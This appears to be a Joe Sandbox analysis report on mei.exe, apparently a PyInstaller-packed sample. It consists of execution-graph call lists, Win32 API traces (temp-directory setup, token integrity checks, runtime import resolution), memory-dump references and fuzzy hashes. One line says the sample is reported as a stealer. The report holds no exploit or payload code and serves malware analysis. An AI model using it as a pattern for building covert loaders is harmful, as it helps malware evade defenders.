calls 16399->16401 16400->16396 16400->16397 16402 7ff6313ef744 16400->16402 16401->16397 16402->16397 16403 7ff6313e52d4 _get_daylight 11 API calls 16402->16403 16403->16399 16405 7ff6313d8c32 WideCharToMultiByte 16404->16405 16406 7ff6313d8bc4 WideCharToMultiByte 16404->16406 16407 7ff6313d8c5f 16405->16407 16414 7ff6313d3ed5 16405->16414 16408 7ff6313d8c05 16406->16408 16409 7ff6313d8bee 16406->16409 16410 7ff6313d2980 57 API calls 16407->16410 16408->16405 16412 7ff6313d8c1b 16408->16412 16411 7ff6313d2980 57 API calls 16409->16411 16410->16414 16411->16414 16413 7ff6313d2980 57 API calls 16412->16413 16413->16414 16414->15756 16414->15757 16416 7ff6313d7b8e 16415->16416 16417 7ff6313ea863 16415->16417 16416->15772 16417->16416 16418 7ff6313ea8ec __std_exception_copy 37 API calls 16417->16418 16419 7ff6313ea890 16418->16419 16419->16416 16420 7ff6313ead74 _wfindfirst32i64 17 API calls 16419->16420 16421 7ff6313ea8c0 16420->16421 16423 7ff6313d3f80 116 API calls 16422->16423 16424 7ff6313d1a76 16423->16424 16425 7ff6313d1c24 16424->16425 16427 7ff6313d8260 83 API calls 16424->16427 16426 7ff6313dbc70 _wfindfirst32i64 8 API calls 16425->16426 16429 7ff6313d1c38 16426->16429 16428 7ff6313d1aae 16427->16428 16454 7ff6313d1adf 16428->16454 16461 7ff6313e07c4 16428->16461 16429->15782 16455 7ff6313d3df0 16429->16455 16431 7ff6313e013c 74 API calls 16431->16425 16432 7ff6313d1ac8 16433 7ff6313d1ae4 16432->16433 16434 7ff6313d1acc 16432->16434 16465 7ff6313e048c 16433->16465 16435 7ff6313d2830 59 API calls 16434->16435 16435->16454 16438 7ff6313d1aff 16440 7ff6313d2830 59 API calls 16438->16440 16439 7ff6313d1b17 16441 7ff6313e07c4 73 API calls 16439->16441 16440->16454 16442 7ff6313d1b64 16441->16442 16443 7ff6313d1b8e 16442->16443 16444 7ff6313d1b76 16442->16444 16446 7ff6313e048c _fread_nolock 53 API calls 16443->16446 16445 7ff6313d2830 59 API calls 16444->16445 16445->16454 16447 7ff6313d1ba3 16446->16447 16448 7ff6313d1bbe 16447->16448 16449 7ff6313d1ba9 
16447->16449 16468 7ff6313e0200 16448->16468 16450 7ff6313d2830 59 API calls 16449->16450 16450->16454 16453 7ff6313d2ad0 59 API calls 16453->16454 16454->16431 16454->16454 16456 7ff6313d1e90 49 API calls 16455->16456 16457 7ff6313d3e0d 16456->16457 16457->15792 16459 7ff6313d1e90 49 API calls 16458->16459 16460 7ff6313d4030 16459->16460 16460->15782 16462 7ff6313e07f4 16461->16462 16474 7ff6313e0554 16462->16474 16464 7ff6313e080d 16464->16432 16486 7ff6313e04ac 16465->16486 16469 7ff6313d1bd2 16468->16469 16470 7ff6313e0209 16468->16470 16469->16453 16469->16454 16471 7ff6313e52d4 _get_daylight 11 API calls 16470->16471 16475 7ff6313e05be 16474->16475 16476 7ff6313e057e 16474->16476 16475->16476 16478 7ff6313e05ca 16475->16478 16477 7ff6313eac88 _invalid_parameter_noinfo 37 API calls 16476->16477 16479 7ff6313e05a5 16477->16479 16485 7ff6313e517c EnterCriticalSection 16478->16485 16479->16464 16487 7ff6313e04d6 16486->16487 16498 7ff6313d1af9 16486->16498 16488 7ff6313e0522 16487->16488 16489 7ff6313e04e5 memcpy_s 16487->16489 16487->16498 16499 7ff6313e517c EnterCriticalSection 16488->16499 16492 7ff6313e52d4 _get_daylight 11 API calls 16489->16492 16494 7ff6313e04fa 16492->16494 16496 7ff6313ead54 _invalid_parameter_noinfo 37 API calls 16494->16496 16496->16498 16498->16438 16498->16439 16501 7ff6313d7916 16500->16501 16502 7ff6313d793a 16501->16502 16503 7ff6313d798d GetTempPathW 16501->16503 16504 7ff6313d7b10 61 API calls 16502->16504 16505 7ff6313d79a2 16503->16505 16506 7ff6313d7946 16504->16506 16539 7ff6313d27d0 16505->16539 16563 7ff6313d73d0 16506->16563 16512 7ff6313dbc70 _wfindfirst32i64 8 API calls 16514 7ff6313d154f 16512->16514 16513 7ff6313d796c __std_exception_copy 16513->16503 16518 7ff6313d797a 16513->16518 16514->15801 16514->15802 16516 7ff6313d79bb __std_exception_copy 16517 7ff6313d7a66 16516->16517 16522 7ff6313d79f1 16516->16522 16543 7ff6313e8954 16516->16543 16546 7ff6313d8900 16516->16546 16520 7ff6313d8ba0 59 API calls 16517->16520 
16519 7ff6313d2ad0 59 API calls 16518->16519 16523 7ff6313d7a77 __std_exception_copy 16520->16523 16524 7ff6313d8a90 57 API calls 16522->16524 16535 7ff6313d7a2a __std_exception_copy 16522->16535 16525 7ff6313d8a90 57 API calls 16523->16525 16523->16535 16526 7ff6313d7a07 16524->16526 16527 7ff6313d7a95 16525->16527 16528 7ff6313d7a0c 16526->16528 16529 7ff6313d7a49 SetEnvironmentVariableW 16526->16529 16530 7ff6313d7a9a 16527->16530 16531 7ff6313d7acd SetEnvironmentVariableW 16527->16531 16532 7ff6313d8a90 57 API calls 16528->16532 16529->16535 16534 7ff6313d8a90 57 API calls 16530->16534 16531->16535 16533 7ff6313d7a1c 16532->16533 16536 7ff6313e7c9c 38 API calls 16533->16536 16537 7ff6313d7aaa 16534->16537 16535->16512 16536->16535 16538 7ff6313e7c9c 38 API calls 16537->16538 16538->16535 16540 7ff6313d27f5 16539->16540 16597 7ff6313e4cc8 16540->16597 16791 7ff6313e8580 16543->16791 16547 7ff6313dbc10 16546->16547 16548 7ff6313d8910 GetCurrentProcess OpenProcessToken 16547->16548 16549 7ff6313d89d1 __std_exception_copy 16548->16549 16550 7ff6313d895b GetTokenInformation 16548->16550 16553 7ff6313d89e4 CloseHandle 16549->16553 16554 7ff6313d89ea 16549->16554 16551 7ff6313d897d GetLastError 16550->16551 16552 7ff6313d8988 16550->16552 16551->16549 16551->16552 16552->16549 16556 7ff6313d899e GetTokenInformation 16552->16556 16553->16554 16922 7ff6313d8600 16554->16922 16556->16549 16558 7ff6313d89c4 ConvertSidToStringSidW 16556->16558 16558->16549 16564 7ff6313d73dc 16563->16564 16565 7ff6313d8a90 57 API calls 16564->16565 16566 7ff6313d73fe 16565->16566 16567 7ff6313d7406 16566->16567 16568 7ff6313d7419 ExpandEnvironmentStringsW 16566->16568 16569 7ff6313d2ad0 59 API calls 16567->16569 16570 7ff6313d743f __std_exception_copy 16568->16570 16576 7ff6313d7412 16569->16576 16571 7ff6313d7443 16570->16571 16572 7ff6313d7456 16570->16572 16574 7ff6313d2ad0 59 API calls 16571->16574 16577 7ff6313d7464 16572->16577 16578 7ff6313d7470 16572->16578 16573 7ff6313dbc70 
_wfindfirst32i64 8 API calls 16575 7ff6313d7538 16573->16575 16574->16576 16575->16535 16587 7ff6313e7c9c 16575->16587 16576->16573 16926 7ff6313e7854 16577->16926 16933 7ff6313e61d8 16578->16933 16581 7ff6313d746e 16582 7ff6313d748a 16581->16582 16586 7ff6313d749d memcpy_s 16581->16586 16583 7ff6313d2ad0 59 API calls 16582->16583 16583->16576 16584 7ff6313d7512 CreateDirectoryW 16584->16576 16585 7ff6313d74ec CreateDirectoryW 16585->16586 16586->16584 16586->16585 16588 7ff6313e7cbc 16587->16588 16589 7ff6313e7ca9 16587->16589 17025 7ff6313e7920 16588->17025 16590 7ff6313e52d4 _get_daylight 11 API calls 16589->16590 16592 7ff6313e7cae 16590->16592 16594 7ff6313ead54 _invalid_parameter_noinfo 37 API calls 16592->16594 16595 7ff6313e7cba 16594->16595 16595->16513 16599 7ff6313e4d22 16597->16599 16598 7ff6313e4d47 16600 7ff6313eac88 _invalid_parameter_noinfo 37 API calls 16598->16600 16599->16598 16601 7ff6313e4d83 16599->16601 16603 7ff6313e4d71 16600->16603 16615 7ff6313e3080 16601->16615 16606 7ff6313dbc70 _wfindfirst32i64 8 API calls 16603->16606 16604 7ff6313eadbc __free_lconv_mon 11 API calls 16604->16603 16608 7ff6313d2814 16606->16608 16607 7ff6313e4e64 16607->16604 16608->16516 16609 7ff6313e4e8a 16609->16607 16612 7ff6313e4e94 16609->16612 16610 7ff6313e4e39 16613 7ff6313eadbc __free_lconv_mon 11 API calls 16610->16613 16611 7ff6313e4e30 16611->16607 16611->16610 16614 7ff6313eadbc __free_lconv_mon 11 API calls 16612->16614 16613->16603 16614->16603 16616 7ff6313e30be 16615->16616 16617 7ff6313e30ae 16615->16617 16618 7ff6313e30c7 16616->16618 16622 7ff6313e30f5 16616->16622 16621 7ff6313eac88 _invalid_parameter_noinfo 37 API calls 16617->16621 16619 7ff6313eac88 _invalid_parameter_noinfo 37 API calls 16618->16619 16620 7ff6313e30ed 16619->16620 16620->16607 16620->16609 16620->16610 16620->16611 16621->16620 16622->16617 16622->16620 16626 7ff6313e3a94 16622->16626 16659 7ff6313e34e0 16622->16659 16696 7ff6313e2c70 16622->16696 16627 7ff6313e3b47 
16626->16627 16628 7ff6313e3ad6 16626->16628 16629 7ff6313e3ba0 16627->16629 16630 7ff6313e3b4c 16627->16630 16631 7ff6313e3b71 16628->16631 16632 7ff6313e3adc 16628->16632 16638 7ff6313e3baa 16629->16638 16639 7ff6313e3bb7 16629->16639 16644 7ff6313e3baf 16629->16644 16633 7ff6313e3b4e 16630->16633 16634 7ff6313e3b81 16630->16634 16715 7ff6313e1e44 16631->16715 16635 7ff6313e3ae1 16632->16635 16636 7ff6313e3b10 16632->16636 16637 7ff6313e3af0 16633->16637 16647 7ff6313e3b5d 16633->16647 16722 7ff6313e1a34 16634->16722 16635->16639 16641 7ff6313e3ae7 16635->16641 16636->16641 16636->16644 16657 7ff6313e3be0 16637->16657 16699 7ff6313e4248 16637->16699 16638->16631 16638->16644 16729 7ff6313e479c 16639->16729 16641->16637 16646 7ff6313e3b22 16641->16646 16655 7ff6313e3b0b 16641->16655 16644->16657 16733 7ff6313e2254 16644->16733 16646->16657 16709 7ff6313e4584 16646->16709 16647->16631 16649 7ff6313e3b62 16647->16649 16653 7ff6313e4648 37 API calls 16649->16653 16649->16657 16651 7ff6313dbc70 _wfindfirst32i64 8 API calls 16652 7ff6313e3eda 16651->16652 16652->16622 16653->16655 16654 7ff6313e48b0 45 API calls 16658 7ff6313e3dcc 16654->16658 16655->16654 16655->16657 16655->16658 16657->16651 16658->16657 16740 7ff6313eee78 16658->16740 16660 7ff6313e3504 16659->16660 16661 7ff6313e34ee 16659->16661 16662 7ff6313e3544 16660->16662 16665 7ff6313eac88 _invalid_parameter_noinfo 37 API calls 16660->16665 16661->16662 16663 7ff6313e3b47 16661->16663 16664 7ff6313e3ad6 16661->16664 16662->16622 16666 7ff6313e3ba0 16663->16666 16667 7ff6313e3b4c 16663->16667 16668 7ff6313e3b71 16664->16668 16669 7ff6313e3adc 16664->16669 16665->16662 16675 7ff6313e3baa 16666->16675 16676 7ff6313e3bb7 16666->16676 16681 7ff6313e3baf 16666->16681 16670 7ff6313e3b4e 16667->16670 16671 7ff6313e3b81 16667->16671 16677 7ff6313e1e44 38 API calls 16668->16677 16672 7ff6313e3ae1 16669->16672 16673 7ff6313e3b10 16669->16673 16674 7ff6313e3af0 16670->16674 16683 7ff6313e3b5d 16670->16683 16679 
Execution Graph (mei.exe, code addresses in the 0x7ff6313d0000 region)

The graph's node/edge list was rendered here as running text and is omitted. What can be recovered from it: every named symbol is an MSVC C runtime internal (_wfindfirst32i64, _invalid_parameter_noinfo, _get_daylight, __free_lconv_mon, _fread_nolock, memcpy_s, __std_exception_copy, __crtLCMapStringW, __FrameHandler3::FrameUnwindToEmptyState), i.e. a statically linked CRT, plus the following Win32 API call sites:

LoadLibraryExW: 7ff6313d8227
GetProcAddress: 7ff6313d5190, 7ff6313d51d0, 7ff6313d51f5, 7ff6313d521a (chained, one after another)
GetFullPathNameW: 7ff6313e5fa8, 7ff6313e601c, 7ff6313e60bf
GetCurrentDirectoryW: 7ff6313ef7fe
GetDriveTypeW: 7ff6313f0321
GetLastError: 7ff6313e5fce, 7ff6313e604f
GetEnvironmentStringsW: 7ff6313f2e4c, 7ff6313f2f5c
FreeEnvironmentStringsW: 7ff6313f2ed4, 7ff6313f2f27, 7ff6313f2fd7
SetEnvironmentVariableW: 7ff6313f1402, 7ff6313f7b13
FlsGetValue: 7ff6313eb6a5
FlsSetValue: 7ff6313eb6c0, 7ff6313eb6ea, 7ff6313eb6fa, 7ff6313eb706
EnterCriticalSection: 7ff6313e517c, 7ff6313f0b68
LeaveCriticalSection: 7ff6313f0bc8
GetACP: 7ff6313f251b
GetOEMCP: 7ff6313f2504
IsValidCodePage: 7ff6313f2bf6
GetCPInfo: 7ff6313f2639, 7ff6313f2c36, 7ff6313f9410
MultiByteToWideChar: 7ff6313efab0
WideCharToMultiByte: 7ff6313f0378
LCMapStringW: 7ff6313ef503
CompareStringW: 7ff6313ef387
HeapSize: 7ff6313f83da
HeapReAlloc: 7ff6313f0dca

The Win32 calls visible in this part of the graph are CRT start-up work (code page and locale setup, environment block handling, FLS slots, critical sections, heap), path handling, and a LoadLibraryExW followed by a chain of GetProcAddress calls, which is how the binary resolves further imports at run time. No networking, file-collection or credential-access APIs appear in this fragment; the stealer behaviour reported for the sample is not visible at this layer of the graph.

Control-flow Graph
APIs
• _get_daylight.LIBCMT ref: 00007FF6313F6265
  • Part of subcall function 00007FF6313F5BB8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6313F5BCC
  • Part of subcall function 00007FF6313EADBC: RtlDeleteBoundaryDescriptor.NTDLL(?,?,?,00007FF6313F3242,?,?,?,00007FF6313F327F,?,?,00000000,00007FF6313F3745,?,?,00000000,00007FF6313F3677), ref: 00007FF6313EADD2
  • Part of subcall function 00007FF6313EADBC: GetLastError.KERNEL32(?,?,?,00007FF6313F3242,?,?,?,00007FF6313F327F,?,?,00000000,00007FF6313F3745,?,?,00000000,00007FF6313F3677), ref: 00007FF6313EADDC
  • Part of subcall function 00007FF6313EAD74: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF6313EAD53,?,?,?,?,?,00007FF6313E307C), ref: 00007FF6313EAD7D
  • Part of subcall function 00007FF6313EAD74: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF6313EAD53,?,?,?,?,?,00007FF6313E307C), ref: 00007FF6313EADA2
• _get_daylight.LIBCMT ref: 00007FF6313F6254
  • Part of subcall function 00007FF6313F5C18: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6313F5C2C
• _get_daylight.LIBCMT ref: 00007FF6313F64CA
• _get_daylight.LIBCMT ref: 00007FF6313F64DB
• _get_daylight.LIBCMT ref: 00007FF6313F64EC
• GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6313F672C), ref: 00007FF6313F6513
Strings
Memory Dump Source
• Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
• Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
Similarity
• API ID: _get_daylight$_invalid_parameter_noinfo$BoundaryCurrentDeleteDescriptorErrorFeatureInformationLastPresentProcessProcessorTimeZone
• String ID: W. Europe Standard Time$W. Europe Summer Time
• API String ID: 3714727158-690618308
• Opcode ID: 40133e312105b648a39a3f8162b8de2ad0b752b0e369cc50cd833349efd25a78
• Instruction ID: 8ad8abc493bab8258c1ea5230095c6461ca0b2a737cbf998a9519bcd1ecc9b9b
• Opcode Fuzzy Hash: 40133e312105b648a39a3f8162b8de2ad0b752b0e369cc50cd833349efd25a78
• Instruction Fuzzy Hash: 82D1BFA6E0825286FB20EF32D8511B977A1EF84B94F458136EA1DC7796DF3CE841A740
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph
APIs
Memory Dump Source
• Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
• Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
Similarity
• API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
• String ID:
• API String ID: 1617910340-0
• Opcode ID: a4dc467cbdc7b29f33270d5940dc9ec44c3090a1b145cc4da5abd16a4521a908
• Instruction ID: c8d8acee6c8b32f012bced0000c09320345c06e4e0ab43a0747b86d9d731745d
• Opcode Fuzzy Hash: a4dc467cbdc7b29f33270d5940dc9ec44c3090a1b145cc4da5abd16a4521a908
• Instruction Fuzzy Hash: EAC1B137F28A4685FB10CFA5C4916AC37A1FB49B98B011235DE2E9B794CF38E555D340
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• GetTempPathW.KERNEL32(00000000,?,00000000,00000000,?,00007FF6313D154F), ref: 00007FF6313D7997
  • Part of subcall function 00007FF6313D7B10: GetEnvironmentVariableW.KERNEL32(00007FF6313D39CF), ref: 00007FF6313D7B4A
  • Part of subcall function 00007FF6313D7B10: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF6313D7B67
  • Part of subcall function 00007FF6313E7C9C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6313E7CB5
• SetEnvironmentVariableW.KERNEL32 ref: 00007FF6313D7A51
  • Part of subcall function 00007FF6313D2AD0: MessageBoxW.USER32 ref: 00007FF6313D2BA5
Strings
Memory Dump Source
• Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
• Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
Similarity
• API ID: Environment$Variable$ExpandMessagePathStringsTemp_invalid_parameter_noinfo
• String ID: LOADER: Failed to set the TMP environment variable.$TMP$TMP$_MEI%d
• API String ID: 3752271684-1116378104
• Opcode ID: 9b8627d2c3ecf1a7861168c1765fe97762ffa896a0d939e1fb66cee7903bdb51
• Instruction ID: 4b08c2cf759908b36d327ced99976495e6e579b4b7ae640c42804cbd9197b0ce
• Opcode Fuzzy Hash: 9b8627d2c3ecf1a7861168c1765fe97762ffa896a0d939e1fb66cee7903bdb51
• Instruction Fuzzy Hash: 6C518362F0D65341FF54BB72A8152BA52819F89BC4F446431ED0ECB797EE3CEA06A310
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph
APIs
• _get_daylight.LIBCMT ref: 00007FF6313F64CA
  • Part of subcall function 00007FF6313F5C18: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6313F5C2C
• _get_daylight.LIBCMT ref: 00007FF6313F64DB
  • Part of subcall function 00007FF6313F5BB8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6313F5BCC
• _get_daylight.LIBCMT ref: 00007FF6313F64EC
  • Part of subcall function 00007FF6313F5BE8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6313F5BFC
  • Part of subcall function 00007FF6313EADBC: RtlDeleteBoundaryDescriptor.NTDLL(?,?,?,00007FF6313F3242,?,?,?,00007FF6313F327F,?,?,00000000,00007FF6313F3745,?,?,00000000,00007FF6313F3677), ref: 00007FF6313EADD2
  • Part of subcall function 00007FF6313EADBC: GetLastError.KERNEL32(?,?,?,00007FF6313F3242,?,?,?,00007FF6313F327F,?,?,00000000,00007FF6313F3745,?,?,00000000,00007FF6313F3677), ref: 00007FF6313EADDC
• GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6313F672C), ref: 00007FF6313F6513
Strings
Memory Dump Source
• Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
• Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
Similarity
• API ID: _get_daylight_invalid_parameter_noinfo$BoundaryDeleteDescriptorErrorInformationLastTimeZone
• String ID: W. Europe Standard Time$W. Europe Summer Time
• API String ID: 1511944507-690618308
• Opcode ID: 01f53ec0730f848f3b94891690d7c75eea43e33e255622230833973c1efab838
• Instruction ID: adf95e90dfbe360ac1701701b97c8ddc400494e2cfd2785adf71d494b520fd03
• Opcode Fuzzy Hash: 01f53ec0730f848f3b94891690d7c75eea43e33e255622230833973c1efab838
• Instruction Fuzzy Hash: 23518EB6E0864286F720DF32E8915B977A0BF88784F455136EA5DC3796DF3CE450AB40
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
• Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
Similarity
• API ID: CurrentFeaturePresentProcessProcessor
• String ID:
• API String ID: 1010374628-0
• Opcode ID: c91a2c26122b6bd4c1cafb1c2484870efabc11783f044b087954d77ccac6e2c6
• Instruction ID: 2e8e0026f42056f7b899bcba9b28166909625d80c28d6f23ce9e3970cfa5f350
• Opcode Fuzzy Hash: c91a2c26122b6bd4c1cafb1c2484870efabc11783f044b087954d77ccac6e2c6
• Instruction Fuzzy Hash: 9F02DD22F1D74381FB65AB26A8102B92AD5AF41BA0F054635ED7DC77D2DE3DE801A310
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Message
                                                                                                                                                                      • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc$pyi_arch_extract2fs was called before temporary directory was initialized!
                                                                                                                                                                      • API String ID: 2030045667-3833288071
                                                                                                                                                                      • Opcode ID: 7be9962e71ed7c31013ec4ca6f16be77bcc022290123e05d4894a39d76e719fa
                                                                                                                                                                      • Instruction ID: 798312970f53e25dd43812004ae9c7da7d356753f7ad0c7508a7764162869e05
                                                                                                                                                                      • Opcode Fuzzy Hash: 7be9962e71ed7c31013ec4ca6f16be77bcc022290123e05d4894a39d76e719fa
                                                                                                                                                                      • Instruction Fuzzy Hash: A8518CB1F0C68286FB109B21E8516B96791FF45B94F844031EE5DC779AEE3CE649E700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • GetCurrentProcess.KERNEL32(0000000100000001,00007FF6313D40FC,00007FF6313D78C1,?,00007FF6313D7CD6,?,00007FF6313D1785), ref: 00007FF6313D8940
                                                                                                                                                                      • OpenProcessToken.ADVAPI32(?,00007FF6313D7CD6,?,00007FF6313D1785), ref: 00007FF6313D8951
                                                                                                                                                                      • GetTokenInformation.KERNELBASE(?,00007FF6313D7CD6(TokenIntegrityLevel),?,00007FF6313D1785), ref: 00007FF6313D8973
                                                                                                                                                                      • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00007FF6313D1785), ref: 00007FF6313D897D
                                                                                                                                                                      • GetTokenInformation.KERNELBASE(?,TokenIntegrityLevel,?,00007FF6313D1785), ref: 00007FF6313D89BA
                                                                                                                                                                      • ConvertSidToStringSidW.ADVAPI32 ref: 00007FF6313D89CC
                                                                                                                                                                      • CloseHandle.KERNEL32(?,00007FF6313D7CD6,?,00007FF6313D1785), ref: 00007FF6313D89E4
                                                                                                                                                                      • LocalFree.KERNEL32(?,00007FF6313D7CD6,?,00007FF6313D1785), ref: 00007FF6313D8A16
                                                                                                                                                                      • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 00007FF6313D8A3D
                                                                                                                                                                      • CreateDirectoryW.KERNELBASE(?,00007FF6313D7CD6,?,00007FF6313D1785), ref: 00007FF6313D8A4E
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Token$ConvertDescriptorInformationProcessSecurityString$CloseCreateCurrentDirectoryErrorFreeHandleLastLocalOpen
                                                                                                                                                                      • String ID: D:(A;;FA;;;%s)$S-1-3-4
                                                                                                                                                                      • API String ID: 4998090-2855260032
                                                                                                                                                                      • Opcode ID: 4e255e83b5d1bb2cdce6492e0eeffc31e39c0aad847d15d4e42a622511608fb7
                                                                                                                                                                      • Instruction ID: 0ee5ded8e1428842fe4924648ec1665a5eef7a8edea3af53b1db3ee58b2ff2ec
                                                                                                                                                                      • Opcode Fuzzy Hash: 4e255e83b5d1bb2cdce6492e0eeffc31e39c0aad847d15d4e42a622511608fb7
                                                                                                                                                                      • Instruction Fuzzy Hash: 56414232A1C78682FB509F51E4446AA73A1FF85794F441231EAAE877E9DF3CE548D700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
